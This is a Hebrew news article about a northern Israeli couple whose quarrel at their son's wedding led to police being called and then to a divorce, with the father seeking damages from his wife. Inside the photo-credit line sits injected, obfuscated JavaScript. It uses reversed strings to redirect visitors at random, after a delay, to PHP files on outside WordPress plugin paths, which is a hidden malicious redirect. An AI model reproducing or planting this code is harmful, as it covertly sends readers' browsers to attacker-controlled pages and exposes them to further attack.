fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

ההורים רבו בחתונת בנם וכעת הם מתגרשים

הורי החתן התעמתו ביניהם באירוע והוא נטש את האולם. עכשיו מבקש אבי החתן פיצויים מאשתו
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

לפני יותר משנה וחצי, במהלך אירוע אליו הוזמנו 1,200 אורחים, השיאו בני זוג מהצפון את בנם בכורם. לאירוע הם הגיעו עם משקעים בעקבות חילוקי דעות וויכוחים ביניהם. במהלך האירוע, פרץ ביניהם ויכוח קולני שאיבד שליטה ולמקום הוזמנו ניידות משטרה כדי להפריד בין הניצים. בשיא המהומה עזב בנם, החתן, את האולם.

מאז יום החתונה פתחו הורי חתן בתהליך גירושים שקיבל כעת תפנית כשאב החתן, איש בעל הון רב ונכסים רבים, טוען באמצעות עו"ד שרין סולן, כי לאשתו אין חלק באדמות והנכסים שבבעלותו ולכן היא אינה זכאית לדבר מהרכוש המשותף.

עו"ד שרין סולן | צילום: יח"צ
עו"ד שרין סולן | צילום: יח"צ

בנוסף הוא מבקש מבית המשפט לפסוק לו פיצוי של מאות אלפי שקלים על עוגמת נפש שנגרמה לו בחתונת בנו. עו"ד סולן טוענת יש לחייב את האישה בהוצאות החתונה שהסתכמו בכמה מאות אלפי שקלים ולקזז את חלקה ברכוש המשותף שנצבר במהלך 25 שנות הנישואים.

ביהמ"ש למשפחה יצטרך לפסוק האם המריבה גרמה לבעל עוגמת נפש והאם נכון לקזז את הנזקים מהרכוש המשותף שאמור להיות מחולק ביניהם שווה בשווה.

"אם יתברר כי היוזמה למריבה הייתה של האישה והיא זו שחוללה את האירוע מתחילתו, והדבר ניתן לבדיקה בעקבות חקירה המשטרה, שהחליטה לסגור את התיק בגלל שלא היו בו אירוע אלימות פיזיים, אזי לבית המשפט לא תהיה ברירה אלא לפצות את שולחה", אומרת עו"ד סולן. עם זאת טוענת האישה, "המריבה נגרמה כתוצאה מהאלימות של בני משפחתו של בעלי ולא בגללי או בגללו".

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות